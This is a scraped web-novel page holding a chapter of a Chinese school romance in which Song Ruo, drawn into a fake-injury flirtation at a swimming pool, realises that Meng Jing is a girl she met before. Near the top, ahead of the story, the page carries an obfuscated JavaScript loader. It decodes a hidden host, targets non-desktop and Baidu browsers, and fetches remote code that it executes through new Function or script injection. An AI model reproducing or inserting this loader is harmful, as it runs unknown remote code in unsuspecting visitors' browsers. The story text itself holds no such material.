98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(12(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

宋若揉着眉心,有点犯愁。怎么一夜之间,阴郁女主增加了话唠属性。还有那个刺目的称呼

她坐在座位,有点不知所措。讲台上宋毅已经朝她这边看了两次了。

她暂且先回了句:先上课吧。

嗯哼。

嗯哼你个头啊。宋若将手机塞进书包里。

这天不是大考,胜似大考。上午四节课,没有哪个老师讲课的,都做模拟卷。半天写下来,同学们都呜呼哀哉。去吃饭的路上,林尽染一个劲说手疼。

午休时间,林尽染说累了要睡觉,宋若就独自去图书馆把上次借的书都还了,回来时,半路突然杀出来个小姑娘,站在她俩面前,红着脸,扭扭捏捏支支吾吾。

像是初中部的小妹妹。

宋若率先问:有什么事吗?

小姑娘点头,小脸泛着红晕,你,你是七班的,帮我交给孟璟好不好。

宋若想了一想,也不知道自己是个什么心情,只是机械地说:这个你自己去比较好。

不不不行的。你是那个宋若嘛,你那么厉害,又和她同班,就帮我转交一下啊

小姑娘双眼泛着水光,眼看就要哭出来了。

宋若一辈子见不得别人哭。

拿着那个烫手山芋往教室走的时候,她心情不太好,满满的腹诽:不愧是小说里,还真有这种事。比如校花校草这种东西,实际上她自己在念书的时候,鲜少有同学有那个闲情逸致去选,顶多私下里觉得谁特别好看,平时多看几眼。毕竟光是应付功课,大多数人已经忙得灰头土脸了。

但哪本青春玛丽苏小说里没有十个八个校花校草?

孟璟在这本书里的定位更神奇,她既是校草,又是校花

回到教室,这位花草不在,桌上放着几张试卷,显得有些凌乱。

林尽染趴在桌上,像只冬眠的小动物一样睡着。

有同学说话,但是音量极低。

是一个静谧的午后了。

宋若把手机掏出来,点进微信,找到婚纱照。

她双眼缓缓睁大。

抹香鲸无可挑剔的长相还在其次。

关键是,两个人之间的表情形成了鲜明对比。

她脸上的笑容虽然和煦,但很清淡,上弦月般虚弱。

可她旁边的孟璟,那个脸,简直就是早晨八九点钟的太阳,要不是她深知内情,来个人凭空告诉她,这抹香鲸是被逼婚的,她都不能信。那真挚的笑颜,仿佛娶到了她梦寐以求的姑娘,开心得像个真正的新娘子。

看着看着,她觉得孟璟的脸略有些眼熟,好像之前在哪里见过。

绝对不是她原来生活的世界,但是又有一些历史感,是旧交的感觉。

在哪里呢。

她一边想,一边将桌上的那封信转到孟璟桌上去,前边忽然有人说话:若若,帮我看看这道题。

宋若转过身,原来是赵媛媛,拿着本化学练习册过来找她。

她点点头,读题后,下笔列了几个方程式。

赵媛媛一边看一边哦哦点头,原来是这样。

电光火石之间,脑海里的线索串成一串。宋若笔下一顿,不由得啼笑皆非:原来是她。

赵媛媛:啊?是谁?

没,没什么。宋若抱歉地摇摇头,微微笑着把那道题做完。

难怪那天下午的黄昏,那拨约群架的小混混们,都管那女生叫景姐。

根本就不是什么景姐,而是璟姐。

难怪觉得昨天接过那头盔的时候,觉得似曾相识。

亏得她苦心孤诣要避免看清她的脸。

原来早就见过了。非但见过,她还自作主张给人取了个外号:霹雳娇娃。

下午放学时分,人都走了,宋若看看后排,收拾完自己的书包,孟璟的书包也给收拾了,卷子一张张叠整齐放里边。然后挎着两个书包去往游泳馆。

在门口遇到盛雪,盛雪哇啊一声:若若你来接你老婆啊。

宋若心想不愧是抹香鲸的发小,做个嘘声的姿势,问:她在里面?

嗯嗯,快去吧。太甜了你们。盛雪笑嘻嘻的,披着湿漉漉的头发走了。

宋若进去,恰逢孟璟刚刚上岸,两人视线相撞的时候,她还是惯性回避了开去。

孟璟分明看见,哎哟了一声,坐在了地上。

宋若有点紧张,赶过去问怎么了。

孟璟哎唷哎唷了两声:怎么办,好像扭到了。

宋若镇静了会儿,蹲下身来,看着跟前两条雪白的大长腿,问了句:扭到哪里。

这里。孟璟拉着她的手搭在右腿某处。

宋若替她揉捏着那线条优美的小腿,按摩了会儿,问:好点了吗?

还疼着呢。

宋若心想这也是没有办法的事,就继续按。

孟璟曲着一条腿,以手支颐,看那洁白纤巧的手指在自己皮肤上流连,再看看未婚妻专注的侧脸,忽然笑出声:哎,你不敢看我,该不会是怕自己爱上我吧?

第17章 你存心的?

游泳馆开阔到有些空旷,不知哪里传来持续的水滴声,清脆悦耳,反而越发显得这空气多寂静,寂静得可爱。眼前人的脸一点一点涨红,孟璟适时补了一句:哇,不是吧,真的爱上我了啊。

宋若搭在她腿上的手早忘记了动作,但也没有撤下来,她半僵在那里,回敬了一句:孟小姐,您太自恋了。

孟璟的声音近在咫尺,呼吸喷在她脸上,温暖的湿润的,那看着我说呀。

这句话一落地,宋若猛然站起身来了,嗖的一声气势迅猛。只可惜她瘦,身上还挎着俩大书包,承受不住这股惯性的冲击,眼看要趔趄,孟璟说时迟那时快地站起来扶住了。

软绵绵的小身体靠在怀中。孟璟想,这样多好啊,乖乖的。

可这个念头还来不及多在脑海停留一秒,怀中人就脱离她的掌控,撤到半米开外去了。

宋若望望适才自己情真意切推拿过的地方,疑心起来,蹙眉问:扭伤好了?

啊?孟璟低头一望,仿佛也很惊讶似的,扶额头:喔,是的呢,老婆你可真是妙手回春哪。

宋若也不追究扭伤的真假了,果断拒绝:别叫我那个!

孟璟揉揉鼻子,不知为什么,七上八下了一整天的心情,反而好了起来,朝她伸出手,书包。

宋若将抹香鲸的书包挂在那只手上。

头顶的大鲸鱼啧了一声,不由分说,把她的包也夺走了,一起拿着往更衣室走,好像掳走了人质一样。她边走边说:等我两分钟。

宋若想跟进去讨回书包,又想起她多半是进去冲澡,不了解这里布局的情况下,她不敢冒失,只得在更衣室外的杏黄色长条凳上坐下。里头旋即传出哗啦哗啦的水声。

孟璟动作很快,说两分钟,还真就两分钟。

她出来时穿着校服,挎着俩包。

宋若跟上去,想把书包要回来。

可孟璟一言不发往前走,她略微愣神就错失了良机。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间